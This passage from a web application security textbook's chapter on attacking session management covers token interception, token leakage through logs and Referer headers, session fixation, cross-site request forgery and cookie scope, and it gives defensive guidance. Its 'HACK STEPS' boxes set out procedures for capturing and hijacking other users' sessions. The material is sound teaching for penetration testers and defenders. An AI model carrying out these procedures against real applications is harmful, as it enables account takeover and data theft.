tion, such as images, scripts, style sheets, and page templates. This

behavior is often indicated by a warning alert within the user’s

browser, as shown in Figure 7-3. As described previously, an attacker

can intercept the user’s session token when the user’s browser accesses

a resource over HTTP, and use this token to access protected, nonstatic

areas of the site over HTTPS.

Figure 7-3: Browsers present a warning alert

when a page accessed over HTTPS contains

items accessed over HTTP.

■■

Even if an application uses HTTPS for every single page, including

unauthenticated areas of the site and static content, there may still be

circumstances in which users’ tokens are transmitted over HTTP. If an

attacker can somehow induce a user to make a request over HTTP

(either to the HTTP service on the same server if one is running or to

http://server:443/ otherwise), then their token may be submitted.

Means by which the attacker may attempt this include sending the user

a URL in an email or instant message, placing auto-loading links into a

web site the attacker controls, or using clickable banner ads. (See Chap-

ter 12 for more details about techniques of this kind for delivering

attacks against other users.)

194 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 194

HACK STEPS

■ Walk through the application in the normal way from first access (the

“start” URL), through the login process, and then through all of the appli-

cation’s functionality. Keep a record of every URL visited, and note every

instance in which a new session token is received. Pay particular atten-

tion to login functions and transitions between HTTTP and HTTPS com-

munications. This can be achieved manually using a network sniffer such

as Wireshark or partially automated using the logging functions of your

intercepting proxy:

■ If HTTP cookies are being used as the transmission mechanism for ses-

sion tokens, verify whether the secure flag is set, preventing them from

ever being transmitted over unencrypted connections.

■ Determine whether, in the normal use of the application, session tokens

are ever transmitted over an unencrypted connection. If so, they should

be regarded as vulnerable to interception.

■ Where the start page uses HTTP, and the application switches to HTTPS

for the login and authenticated areas of the site, verify whether a new

token is issued following login, or whether a token transmitted during

the HTTP stage is still being used to track the user’s authenticated ses-

sion. Also verify whether the application will accept login over HTTP if

the login URL is modified accordingly.

■ Even if the application uses HTTPS for every single page, verify whether

the server is also listening on port 80, running any service or content

whatsoever. If so, visit any HTTP URL directly from with an authenticated

session and verify whether the session token is transmitted.

■ In cases where a token for an authenticated session is transmitted to the

server over HTTP, verify whether that token continues to be valid or is

immediately terminated by the server.

Chapter 7 ■ Attacking Session Management 195

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 195

Disclosure of Tokens in Logs

Aside from the clear-text transmission of session tokens in network communi-

cations, the most common place where tokens are simply disclosed to unau-

thorized view is in system logs of various kinds. Although it is a rarer

occurrence, the consequences of this kind of disclosure are usually more seri-

ous because those logs may be viewed by a far wider range of potential attack-

ers, and not just by someone who is suitably positioned to eavesdrop on the

network.

Many applications provide functionality for administrators and other sup-

port personnel to monitor and control aspects of the application’s runtime

state, including user sessions. For example, a helpdesk worker assisting a user

who is having problems may ask for their username, locate their current ses-

sion through a list or search function, and view relevant details about the ses-

sion. Or an administrator may consult a log of recent sessions in the course of

investigating a security breach. Often, this kind of monitoring and control

functionality discloses the actual session token associated with each session.

And often, the functionality is poorly protected, allowing unauthorized users

to access the list of current session tokens, and thereby hijack the sessions of all

application users.

The other main cause of session tokens appearing in system logs is where an

application uses the URL query string as a mechanism for transmitting tokens,

as opposed to using HTTP cookies or the body of

POST requests. For example,

googling for

inurl:jsessionid identifies thousands of applications that

transmit the Java platform session token (called

jsessionid) within the URL:

http://www.webjunction.org/do/Navigation;jsessionid=

F27ED2A6AAE4C6DA409A3044E79B8B48?category=327

When applications transmit their session tokens in this way, it is likely that

their session tokens will appear in various system logs to which unauthorized

parties may have access, for example:

■■

Users’ browser logs.

■■

Web server logs.

■■

Logs of corporate or ISP proxy servers.

■■

Logs of any reverse proxies employed within the application’s hosting

environment.

■■

The Referer logs of any servers that application users visit by following

off-site links, as in Figure 7-4.

196 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 196

Some of these vulnerabilities will arise even if HTTPS is used throughout

the application.

The final case just described presents an attacker with a highly effective

means of capturing session tokens in some applications. For example, if a web

mail application transmits session tokens within the URL, then an attacker can

send emails to users of the application containing a link to a web server that he

controls. If any user accesses the link (e.g., because they click on it, or because

their browser loads images contained within HTML-formatted email), then

the attacker will receive, in real time, the session token of the user. The attacker

can run a simple script on his server to hijack the session of every token

received and perform some malicious action, such as send spam email, harvest

personal information, or change passwords.

NOTE Current versions of Internet Explorer do not include a Referer header

when following off-site links contained in a page that was accessed over

HTTPS. In this situation, Firefox includes the Referer header provided that the

off-site link is also being accessed over HTTPS, even if it belongs to a different

domain. Hence, sensitive data placed into URLs is vulnerable to leakage in

Referer logs even where SSL is being used.

Figure 7-4: When session tokens appear in URLs, these will be transmitted

in the Referer header when users follow an off-site link or their browser

loads an off-site resource.

Chapter 7 ■ Attacking Session Management 197

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 197

HACK STEPS

■ Identify all of the functionality within the application and locate any log-

ging or monitoring functions where session tokens can be viewed. Verify

who is able to access this functionality–for example, administrators, any

authenticated user, or any anonymous user. See Chapter 4 for techniques

for discovering hidden content that is not directly linked from the main

application.

■ Identify any instances within the application where session tokens are

transmitted within the URL. It may be that tokens are generally transmit-

ted in a more secure manner but that developers have used the URL in

specific cases to work around particular difficulties. For example, this

behavior is often observed where a web application interfaces to an

external system.

■ If session tokens are being transmitted in URLs, attempt to find any

application functionality that enables you to inject arbitrary off-site links

into pages viewed by other users — for example, functionality implement-

ing a message board, site feedback, question-and-answer, and so on. If

so, submit links to a web server you control and wait to see whether any

users’ session tokens are received in your Referer logs.

■ If any session tokens are captured, attempt to hijack user sessions by

using the application as normal but substituting a captured token for

your own. Some intercepting proxies can be configured with regex-based

content replacement rules to automatically modify items such as HTTP

cookies. If a large number of tokens are captured, and session hijacking

allows you to access sensitive data such as personal details, payment

information or user passwords, you can use the automated techniques

described in Chapter 13 to harvest all desired data belonging to other

application users.

Vulnerable Mapping of Tokens to Sessions

Various common vulnerabilities in session management mechanisms arise

because of weaknesses in the way the application maps the creation and pro-

cessing of session tokens to individual users’ sessions themselves.

The simplest weakness is to allow multiple valid tokens to be concurrently

assigned to the same user account. In virtually every application, there is no

legitimate reason why any user should have more than one session active at

any given time. Of course, it is fairly frequent for a user to abandon an active

session and start a new one — for example, because they have closed a

browser window or have moved to a different computer. But if a user appears

to be using two different sessions simultaneously, this usually indicates that a

198 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 198

security compromise has occurred: either the user has disclosed their creden-

tials to another party or an attacker has obtained their credentials through

some other means. In both cases, permitting concurrent sessions is undesirable

because it allows users to persist in undesirable practices without inconve-

nience and because it allows an attacker to use captured credentials without

risk of detection.

A related but distinct weakness is for applications to use “static” tokens.

These look like session tokens and may initially appear to function like them,

but in fact they are no such thing. In these applications, each user is assigned a

token, and this same token is reissued to the user every time he logs in. The

application always accepts the token as valid regardless of whether the user

has recently logged in and been issued with it. Applications like this really

involve a misunderstanding of the whole concept of what a session is, and the

benefits that it provides for managing and controlling access to the applica-

tion. Sometimes, applications operate like this as a means of implementing

poorly designed “remember me” functionality, and the static token is accord-

ingly stored in a persistent cookie (see Chapter 6). Sometimes the tokens them-

selves are vulnerable to prediction attacks, making the vulnerability far more

serious because rather than compromising the sessions of currently logged-in

users, a successful attack will compromise, for all time, the accounts of all reg-

istered users.

Other kinds of strange application behavior are also occasionally observed

that demonstrate a fundamental defect in the relationship between tokens and

sessions. One example is where a meaningful token is constructed based upon

a username and a random component. For example, consider the token:

dXNlcj1kYWY7cjE9MTMwOTQxODEyMTM0NTkwMTI=

which Base64-decodes to:

user=daf;r1=13094181213459012

After extensive analysis of the r1 component, we may conclude that this

cannot be predicted based on a sample of values. However, if the application’s

session processing logic is awry, it may be that an attacker simply needs to

submit any valid value as

r1 and any valid value as user, in order to access a

session under the security context of the specified user. This is essentially an

access control vulnerability, because decisions about access are being made on

the basis of user-supplied data outside of the session (see Chapter 8). It arises

because the application effectively uses session tokens to signify that the

requester has established some kind of valid session with the application; how-

ever, the user context in which that session is processed is not an integral prop-

erty of the session itself but is determined per-request through some other

means. In this case, that means can be directly controlled by the requester.

Chapter 7 ■ Attacking Session Management 199

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 199

HACK STEPS

■ Log in to the application twice using the same user account, either from

different browser processes or from different computers. Determine

whether both sessions remain active concurrently. If so, the application

supports concurrent sessions, enabling an attacker who has compro-

mised another user’s credentials to make use of these without risk of

detection.

■ Log in and log out several times using the same user account, either from

different browser processes or from different computers. Determine

whether a new session token is issued each time or whether the same

token is issued each time you log in. If the latter occurs, then the applica-

tion is not really employing proper sessions at all.

■ If tokens appear to contain any structure and meaning, attempt to sepa-

rate out components that may identify the user from those that appear to

be inscrutable. Try to modify any user-related components of the token

so that they refer to other known users of the application, and verify

whether the resulting token (a) is accepted by the application, and (b)

enables you to masquerade as that user.

Vulnerable Session Termination

Proper termination of sessions is important for two reasons. First, keeping the

lifespan of a session as short as is necessary reduces the window of opportu-

nity within which an attacker may capture, guess, or misuse a valid session

token. Second, it provides users with a means of invalidating an existing ses-

sion when they no longer require it, thereby enabling them to reduce this win-

dow further and to take some responsibility for securing their session in a

shared computing environment. The main weaknesses in session termination

functions involve failures to meet these two key objectives.

Some applications do not enforce effective session expiration. Once created, a

session may remain valid for many days after the last request is received, before

it is eventually cleaned up by the server. If tokens are vulnerable to some kind of

sequencing flaw that is particularly difficult to exploit (for example, 100,000

guesses for each valid token identified), an attacker may still be able to capture

the tokens of every user who has accessed the application in the recent past.

Some applications do not provide effective logout functionality:

■■

In some cases, a logout function is simply not implemented. Users have

no means of causing the application to invalidate their session.

■■

In some cases, the logout function does not actually cause the server to

invalidate the session. The server removes the token from the user’s

browser (for example, by issuing a

Set-Cookie instruction to blank the

200 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 200

token). However, if the user continues to submit the token, then it is still

accepted by the server.

■■

In the worst cases, when a user clicks Logout, this fact is not communi-

cated to the server at all, and so the server performs no action whatso-

ever. Rather, a client-side script is executed that blanks the user’s

cookie, meaning that subsequent requests return the user to the login

page. An attacker who gains access to this cookie could use the session

as if the user had never logged out.

HACK STEPS

■ Do not fall into the trap of examining actions that the application per-

forms on the client-side token (such as cookie invalidation via a new

Set-Cookie instruction, client-side script, or an expiration time

attribute). In terms of session termination, nothing much depends upon

what happens to the token within the client browser. Rather, investigate

whether session expiration is implemented on the server side:

■

Wait for a period without using this token, and then submit a request

for a protected page (e.g., “my details”) using the token.

■

If the page is displayed as normal, then the token is still active.

■

Use trial and error to determine how long any session expiration time-

out is, or whether a token can still be used days after the last request

using it. Burp Intruder can be configured to increment the time inter-

val between successive requests, to automate this task.

■ Determine whether a logout function exists and is prominently made

available to users. If not, users are more vulnerable because they have

no means of causing the application to invalidate their session.

■ Where a logout function is provided, test its effectiveness. After logging

out, attempt to reuse the old token and determine whether it is still

valid. If so, users remain vulnerable to some session hijacking attacks

even after they have “logged out.”

Client Exposure to Token Hijacking

There are various ways in which an attacker can target other users of the appli-

cation in an attempt to capture or misuse the victim’s session token:

■■

An obvious payload for cross-site scripting attacks is to query the user’s

cookies to obtain their session token, which can then be transmitted to

an arbitrary server controlled by the attacker. All of the various permu-

tations of this attack are described in detail in Chapter 12.

Chapter 7 ■ Attacking Session Management 201

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 201

■■

Various other attacks against users can be used to hijack the user’s ses-

sion in different ways. These include session fixation vulnerabilities,

where an attacker feeds a known session token to a user, waits for them

to log in, and then hijacks their session; as well as cross-site request

forgery attacks, in which an attacker makes a crafted request to an

application from a web site that he controls, and exploits the fact that

the user’s browser automatically submits her current cookie with this

request. These attacks are also described in Chapter 12.

HACK STEPS

■ Identify any cross-site scripting vulnerabilities within the application and

determine whether these can be exploited to capture the session tokens

of other users (see Chapter 12).

■ If the application issues session tokens to unauthenticated users, obtain a

token and perform a login. If the application does not issue a fresh token

following a successful login, then it is vulnerable to session fixation.

■ Even if the application does not issue session tokens to unauthenticated

users, obtain a token by logging in, and then return to the login page. If

the application is willing to return this page even though you are already

authenticated, submit another login as a different user using the same

token. If the application does not issue a fresh token after the second

■ Identify the format of session tokens used by the application. Modify

your token to an invented value that is validly formed, and attempt to

using an invented token, then it is vulnerable to session fixation.

■ If the application does not support login, but processes sensitive user

information (such as personal and payment details), and allows this to

be displayed after submission (e.g., on a “verify my order” page), then

carry out the previous three tests in relation to the pages displaying sen-

sitive data. If a token set during anonymous usage of the application can

later be used to retrieve sensitive user information, then the application

is vulnerable to session fixation.

■ If the application uses HTTP cookies to transmit session tokens, then it

may well be vulnerable to cross-site request forgery (XSRF). First, log in to

the application. Then confirm that a request made to the application but

originating from a page of a different application results in submission of

the user’s token. (This submission will need to be made from a window of

the same browser process as was used to log in to the target application.)

Attempt to identify any sensitive application functions all of whose para-

meters can be determined in advance by an attacker, and exploit this to

carry out unauthorized actions within the security context of a target user.

See Chapter 12 for more details on how to execute XSRF attacks.

202 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 202

Liberal Cookie Scope

The usual simple summary of how cookies work is that the server issues a

cookie using the HTTP response header

Set-cookie, and the browser then

resubmits this cookie in subsequent requests to the same server using the

Cookie header. In fact, matters are rather more subtle than this.

The cookie mechanism allows a server to specify both the domain and the

URL path to which each cookie will be resubmitted. To do this, it uses the

domain

and path attributes that may be included in the Set-cookie instruction.

Cookie Domain Restrictions

When the application residing at foo.wahh-app.com sets a cookie, the browser

will by default resubmit the cookie in all subsequent requests to

foo.wahh-

app.com

, and also to any subdomains, such as admin.foo.wahh-app.com. It will

not submit the cookie to any other domains, including the parent domain

wahh-

app.com

and any other subdomains of the parent, such as bar.wahh-app.com.

A server can override this default behavior by including a

domain attribute

in the

Set-cookie instruction. For example, suppose that the application at

foo.wahh-app.com returns the following HTTP header:

Set-cookie: sessionId=19284710; domain=wahh-app.com;

The browser will then resubmit this cookie to all subdomains of wahh-app.com,

including

bar.wahh-app.com.

NOTE A server cannot specify just any domain using this attribute. First, the

domain specified must be either the same domain as the application is running

on or a domain that is its parent (either immediately or at some remove).

Second, the domain specified cannot be a top-level domain such as .com or

.co.uk, because this would enable a malicious server to set arbitrary cookies

on any other domain. If the server violates one of these rules, the browser will

simply ignore the Set-cookie instruction.

If an application sets a cookie’s domain scope as unduly liberal, this may

expose the application to various security vulnerabilities.

For example, consider a blogging application that allows users to register,

located at the domain

wahh-blogs.com, and when users log in to the applica-

tion they receive a session token in a cookie that is scoped to this domain. Each

user is able to create blogs that are accessed via a new subdomain which is pre-

fixed by their username, for example:

herman.wahh-blogs.com

solero.wahh-blogs.com

Chapter 7 ■ Attacking Session Management 203

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 203

Because cookies are automatically resubmitted to every subdomain within

their scope, when a user who is logged in browses the blogs of other users,

their session token will be submitted with their requests. If blog authors are

permitted to place arbitrary JavaScript within their own blogs (as is usually

the case in real-world blog applications), then a malicious blogger will be able

to steal the session tokens of other users in the same way as is done in a stored

cross-site scripting attack (see Chapter 12).

The problem arises because user-authored blogs are created as subdomains

of the main application that handles authentication and session management.

There is no facility within HTTP cookies for the application to prevent cookies

issued by the main domain from being resubmitted to its subdomains.

The solution is to use a different domain name for the main application (for

example,

www.wahh-blogs.com), and scope the domain of its session token

cookies to this fully qualified name. The session cookie will not then be sub-

mitted when a logged-in user browses the blogs of other users.

A different version of this vulnerability arises when an application explicitly

sets the domain scope of its cookies to a parent domain. For example, suppose

that a security-critical application is located at the domain

sensitiveapp

.wahh-organization.com

. When it sets cookies, it explicitly liberalizes their

domain scope, as follows:

Set-cookie: sessionId=12df098ad809a5219; domain=wahh-organization.com

The consequence of this is that the sensitive application’s session token cook-

ies will be submitted when a user visits every subdomain used by

wahh-orga-

nization.com

, including:

www.wahh-organization.com

testapp.wahh-organization.com

Although these other applications may all belong to the same organization

as the sensitive application, it is undesirable for the sensitive application’s

cookies to be submitted to other applications, for several reasons:

■■

The personnel responsible for the other applications may have a differ-

ent level of trust than those responsible for the sensitive application.

■■

The other applications may contain functionality which enables third

parties to obtain the value of cookies submitted to the application, as in

the previous blogging example.

■■

The other applications may not have been subjected to the same secu-

rity standards or testing as the sensitive application (e.g., because they

are less important, do not handle sensitive data, or have been created

only for test purposes). Many kinds of vulnerability that may exist in

those applications (for example, cross-site scripting vulnerabilities) may

204 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 204

be irrelevant to the security posture of those applications but could

enable an external attacker to leverage an insecure application in order

to capture session tokens created by the sensitive application.

Cookie Path Restrictions

When the application residing at /apps/secure/foo-app/index.jsp sets a

cookie, the browser will by default resubmit the cookie in all subsequent

requests to the path

/apps/secure/foo-app/, and also to any subdirectories. It

will not submit the cookie to the parent directory or to any other directory

paths that exist on the server.

As with domain-based restrictions on cookie scope, a server can override

this default behavior by including a

path attribute in the Set-cookie instruc-

tion. For example, if the application returns the following HTTP header:

Set-cookie: sessionId=187ab023e09c00a881a; path=/apps/;

the browser will then resubmit this cookie to all subdirectories of the /apps/

path.

NOTE If the application specifies a path attribute that does not contain a

trailing slash, then the browser will not interpret this as representing an actual

directory. Rather it will submit the cookie to any paths that match the pattern

specified. For example, if the application specifies a path scope of /apps, then

the browser will submit its cookies to the paths /apps-test/ and /apps-

old/ and all of their subdirectories, in addition to the path /apps/. This

behavior is probably not what the developer intended.

It is surprisingly common to encounter applications that explicitly liberalize

the path scope of their cookies to the web server root (

/). In this situation, the

application’s cookies will be submitted to every application accessible via the

same domain name. For example:

/apps/secure/bar-app/

/apps/test/

/blogs/users/solero/

Liberalizing a cookie’s path scope can leave an application vulnerable in the

same way as when an application sets the domain scope of a cookie to its par-

ent domain. If a security-critical application sets a cookie with its path scope

set to the web server root, and a less secure application resides at some other

path, then the cookies issued by the former application will be submitted to

the latter. This will enable an attacker to leverage any weakness in the less

secure application as a means of attacking sessions on the more secure target.

Chapter 7 ■ Attacking Session Management 205

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 205

NOTE In certain circumstances it may be possible to circumvent cookie path

restrictions, enabling a malicious web site residing at one path to access the

cookies belonging to an application at a different path. Hence, the path

attribute should not be relied upon to be completely reliable. See the following

paper by Amit Klein for more details:

www.webappsec.org/lists/websecurity/archive/2006-03/

msg00000.html

HACK STEPS

Review all of the cookies issued by the application, and check for any domain

or path attributes used to control of the scope of the cookies.

■ If an application explicitly liberalizes its cookies’ scope to a parent

domain or parent directory, then it may be leaving itself vulnerable to

attacks via other web applications.

■ If an application sets its cookies’ domain scope to its own domain name

(or does not specify a domain attribute), then it may still be exposed to

applications or functionality accessible via subdomains.

■ If an application specifies its cookies’ path scope without using a trailing

slash, then it might be exposed to other applications residing at paths

containing a prefix that matches the specified scope.

Identify all of the possible domain names and paths that will receive the

cookies issued by the application. Establish whether any other web application

or functionality is accessible via these domain names or paths that you may be

able to leverage to obtain the cookies issued to users of the target application.

Securing Session Management

The defensive measures that web applications must take to prevent attacks on

their session management mechanisms correspond to the two broad cate-

gories of vulnerability that affect those mechanisms. In order to perform ses-

sion management in a secure manner, an application must generate its tokens

in a robust way and must protect these tokens throughout their lifecycle from

creation to disposal.

Generate Strong Tokens

The tokens used to re-identify a user between successive requests should be

generated in a manner that does not provide any scope for an attacker who

206 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 206

obtains a large sample of tokens from the application in the usual way to pre-

dict or extrapolate the tokens issued to other users.

The most effective token generation mechanisms are those that:

(a) use an extremely large set of possible values, and

(b) contain a strong source of pseudo-randomness, ensuring an even and

unpredictable spread of tokens across the range of possible values.

In principle, any item of arbitrary length and complexity may be guessed

using brute force given sufficient time and resources. The objective of design-

ing a mechanism for generating strong tokens is that it should be extremely

unlikely that a determined attacker with large amounts of bandwidth and pro-

cessing resources should be successful in guessing a single valid token within

the lifespan of its validity.

Tokens should consist of nothing more than an identifier used by the server

to locate the relevant session object to be used for processing the user’s

request. The token should contain no meaning or structure, either overtly or

wrapped in layers of encoding or obfuscation. All data about the session’s

owner and status should be stored on the server in the session object to which

the session token corresponds.

Care should be taken when selecting a source of randomness. Developers

should be aware that the various sources available to them are likely to differ

in strength very significantly. Some, as with

java.util.Random, are perfectly

useful for many purposes where a source of changing input is required, but

can be extrapolated in both forward and reverse directions with perfect cer-

tainty on the basis of a single item of output. Developers should investigate

the mathematical properties of the actual algorithms used within different

available sources of randomness and should read relevant documentation

about the recommended uses of different APIs. In general, if an algorithm is

not explicitly described as being cryptographically secure, it should be

assumed to be predictable.

NOTE Some high-strength sources of randomness take some time to return

the next value in their output sequence because of the steps they take to

obtain sufficient entropy (from system events, etc.) and so may not deliver

values sufficiently fast to generate tokens for some high-volume applications.

In addition to selecting the most robust source of randomness that is feasi-

ble, a good practice is to introduce as a source of entropy some information

about the individual request for which the token is being generated. This

information may not be unique to that request, but it can be very effective in

Chapter 7 ■ Attacking Session Management 207

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 207

mitigating any weaknesses in the core pseudo-random number generator

being used. Examples of information that may be incorporated include:

■■

The source IP address and port number from which the request was

received.

■■

The User-Agent header in the request.

■■

The time of the request in milliseconds.

A highly effective formula for incorporating this entropy is to construct a

string that concatenates a pseudo-random number, a variety of request-

specific data as listed, and a secret string known only to the server and gener-

ated afresh on each reboot. A suitable hash is then taken of this string (using,

for example, SHA-256 at the time of this writing), to produce a manageable

fixed-length string that can be used as a token. (Placing the most variable items

towards the start of the hash’s input serves to maximize the “avalanche” effect

within the hashing algorithm.)

TIP Having decided upon an algorithm for generating session tokens, a useful

“thought experiment” is to imagine that your source of pseudo-randomness is

totally broken and always returns the same value. In this eventuality, would an

attacker who obtains a large sample of tokens from the application be able to

extrapolate tokens issued to other users? Using the formula described here,

this will in general be highly unlikely, even with full knowledge of the algorithm

used. The source IP, port number, User-Agent header, and time of request

together generate a vast amount of entropy. And even with full knowledge of

these, the attacker will not be able to produce the corresponding token without

knowing the secret string used by the server.

Protect Tokens throughout Their Lifecycle

Having created a robust token whose value cannot be predicted, this token

needs to be protected throughout its lifecycle from creation to disposal, to

ensure that it is not disclosed to anyone other than the user to whom it is

issued:

■■

The token should only ever be transmitted over HTTPS. Any token

transmitted in clear text should be regarded as tainted — that is, as not

providing assurance of the user’s identity. If HTTP cookies are being

used to transmit tokens, these should be flagged as

secure to prevent

the user’s browser from ever transmitting them over HTTP. If feasible,

HTTPS should be used for every page of the application, including sta-

tic content such as help pages, images, and so on. If this is not desired

208 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 208

and an HTTP service is still implemented, the application should redi-

rect any requests for sensitive content (including the login page) back to

the HTTPS service. Static resources such as help pages are not usually

sensitive and may be accessed without any authenticated session;

hence, the use of secure cookies can be backed up using cookie scope

instructions to prevent tokens being submitted in requests for these

resources.

■■

Session tokens should never be transmitted in the URL, as this provides

a trivial vehicle for session fixation attacks and results in tokens appear-

ing in numerous logging mechanisms. In some cases, developers use

this technique to implement sessions in browsers that have cookies dis-

abled. However, a better means of achieving this is to use

POST requests

for all navigation and store tokens in a hidden field of an HTML form.

■■

Logout functionality should be implemented. This should dispose of all

session resources held on the server and invalidate the session token.

■■

Session expiration should be implemented after a suitable period of

inactivity (e.g., 10 minutes). This should result in the same behavior as

if the user had explicitly logged out.

■■

Concurrent logins should be prevented. Each time a user logs in, a dif-

ferent session token should be issued, and any existing session belong-

ing to the user should be disposed of as if she had logged out from it.

When this occurs, the old token may be stored for a period and any

subsequent requests received using the token should return a security

alert to the user stating that the session has been terminated because

she has logged in from a different location.

■■

If the application contains any administrative or diagnostic functional-

ity that enables session tokens to be viewed, this functionality should

be robustly defended against unauthorized access. In most cases, there

is no necessity for this functionality to display the actual session token

at all — rather, it should contain sufficient details about the owner of

the session for any support and diagnostic tasks to be performed, with-

out divulging the session token being submitted by the user to identify

her session.

■■

The domain and path scope of an application’s session cookies should

be set as restrictively as possible. Cookies with overly liberal scope are

often generated by poorly configured web application platforms or web

servers, rather than by the application developers themselves. There

should be no other web applications or untrusted functionality accessi-

ble via domain names or URL paths that are included within the scope

of the application’s cookies. Particular attention should be paid to any

Chapter 7 ■ Attacking Session Management 209

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 209

existing subdomains to the domain name that is used to access the

application. In some cases, to ensure that this vulnerability does not

arise, it may be necessary to modify the domain- and path-naming

scheme employed by the various applications in use within the

organization.

Specific measures should be taken to defend the session management mech-

anism against the variety of attacks with which the application’s users may

find themselves targeted:

■■

The application’s codebase should be rigorously audited to identify and

remove any cross-site scripting vulnerabilities (see Chapter 12). Most

such vulnerabilities can be exploited to attack session management

mechanisms. In particular, stored (or second-order) XSS attacks can usu-

ally be exploited to defeat every conceivable defense against session

misuse and hijacking.

■■

Arbitrary tokens submitted by users that the server does not recognize

should not be accepted. The token should be immediately canceled

within the browser, and the user should be returned to the application’s

start page.

■■

Cross-site request forgery and other session attacks can be made more

difficult by requiring two-step confirmation and/or reauthentication

before critical actions such as funds transfers are carried out.

■■

Cross-site request forgery attacks can be defended against by not rely-

ing solely upon HTTP cookies for transmitting session tokens. Using

the cookie mechanism introduces the vulnerability because cookies are

automatically submitted by the browser regardless of what caused the

request to take place. If tokens are always transmitted in a hidden field

of an HTML form, then an attacker cannot create a form whose submis-

sion will cause an unauthorized action unless he already knows the

value of the token, in which case he can simply perform a trivial hijack-

ing attack. Per-page tokens can also help prevent these attacks (see the

following section).

■■

A fresh session should always be created after successful authentica-

tion, to mitigate the effects of session fixation attacks. Where an applica-

tion does not use authentication but does allow sensitive data to be

submitted, the threat posed by fixation attacks is harder to address.

One possible approach is to keep the sequence of pages where sensitive

data is submitted as short as possible, and either (a) create a new ses-

sion at the first page of this sequence (where necessary, copying from

the existing session any required data, such as the contents of a shop-

ping cart), or (b) use per-page tokens (described in the following sec-

tion) to prevent an attacker who knows the token used in the first page

210 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 210

from accessing subsequent pages. Except where strictly necessary, per-

sonal data should not be displayed back to the user at all. Even where

this is required (e.g., a “confirm order” page showing addresses), sensi-

tive items such as credit card numbers and passwords should never be

displayed back to the user and should always be masked within the

source of the application’s response.

Per-Page Tokens

Finer-grained control over sessions can be achieved, and many kinds of session

attacks made more difficult or impossible, by using per-page tokens in addition to

session tokens. Here, a new page token is created every time a user requests an

application page (as opposed to an image, for example) and is passed to the client

in a cookie or a hidden field of an HTML form. Each time the user makes a

request, the page token is validated against the last value issued, in addition to the

normal validation of the main session token. In the case of a non-match, the entire

session is terminated. Many of the most security-critical web applications on the

Internet, such as online banks, employ per-page tokens to provide increased pro-

tection for their session management mechanism, as shown in Figure 7-5.

Figure 7-5: Per-page tokens used in a banking application

While the use of per-page tokens does impose some restrictions on navigation

(for example, on use of the back and forward buttons and multi-window brows-

ing), it effectively prevents session fixation attacks and ensures that the simulta-

neous use of a hijacked session by a legitimate user and an attacker will quickly

be blocked after both have made a single request. Per-page tokens can also be

leveraged to track the user’s location and movement through the application,

and used to detect attempts to access functions out of a defined sequence, help-

ing to protect against certain access control defects (see Chapter 8).

Chapter 7 ■ Attacking Session Management 211

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 211

Log, Monitor, and Alert

The application’s session management functionality should be closely inte-

grated with its mechanisms for logging, monitoring, and alerting, in order to

provide suitable records of anomalous activity and enable administrators to

take defensive actions where necessary:

■■

The application should monitor requests that contain invalid tokens.

Except in the most trivially predictable cases, a successful attack

attempting to guess the tokens issued to other users will typically

involve issuing large numbers of requests containing invalid tokens,

leaving a noticeable mark in the application’s logs.

■■

Brute-force attacks against session tokens are difficult to block altogether,

because there is no particular user account or session that can be disabled

to stop the attack. One possible action is to block source IP addresses for

a period when a number of requests containing invalid tokens have been

received. However, this may be ineffective when one user’s requests orig-

inate from multiple IP addresses (e.g., AOL users) or when multiple

users’ requests originate from the same IP address (e.g., users behind a

proxy or a firewall performing network address translation).

■■

Even if brute-force attacks against sessions cannot be effectively pre-

vented in real time, keeping detailed logs and alerting administrators

enables them to investigate the attack and take appropriate action

where they are able to.

■■

Wherever possible, users should be alerted to anomalous events relat-

ing to their session — for example, concurrent logins or apparent

hijacking (detected using per-page tokens). Even though a compromise

may already have occurred, this enables the user to check whether any

unauthorized actions such as funds transfers have taken place.

Reactive Session Termination

The session management mechanism can be leveraged as a highly effective

defense against many kinds of other attacks against the application. Some

security-critical applications such as online banking are extremely aggressive in

terminating a user’s session every time the user submits some anomalous

request — for example, any request containing a modified hidden HTML form

field or URL query string parameter, any request containing strings associated

with SQL injection or cross-site scripting attacks, and any user input that would

normally have been blocked by client-side checks such as length restrictions.

Of course, any actual vulnerabilities that may be exploited using such

requests need to be addressed at source. But forcing users to reauthenticate

212 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 212

every time they submit an invalid request can slow down the process of prob-

ing the application for vulnerabilities by many orders of magnitude, even

where automated techniques are employed. If residual vulnerabilities do still

exist, they are far less likely to be discovered by anyone in the field.

Where this kind of defense is implemented, it is also recommended that it

can be easily switched off for testing purposes. If a legitimate penetration test

of the application is slowed down in the same way as a real-world attacker,

then its effectiveness is dramatically reduced, and it is very likely that the pres-

ence of the mechanism will result in more vulnerabilities remaining in pro-

duction code than if the mechanism were absent.

HACK STEPS

If the application you are attacking uses this kind of defensive measure, you

may find that probing the application for many kinds of common vulnerability

is extremely time-consuming, and the mind-numbing need to log in after each

failed test and renavigate to the point of the application you were looking at

quickly leads you to give up.

In this situation, you can often use automation to tackle the problem. When

using Burp Intruder to perform an attack, you can use the Obtain Cookie

feature to perform a fresh login before sending each test case, and use the new

session token (provided that the login is single-stage). When browsing and

probing the application manually, you can use the extensibility features of Burp

Proxy via the IBurpExtender interface. You can create an extension which

detects when the application has performed a forced logout, automatically logs

back in to the application, and returns the new session and page to the

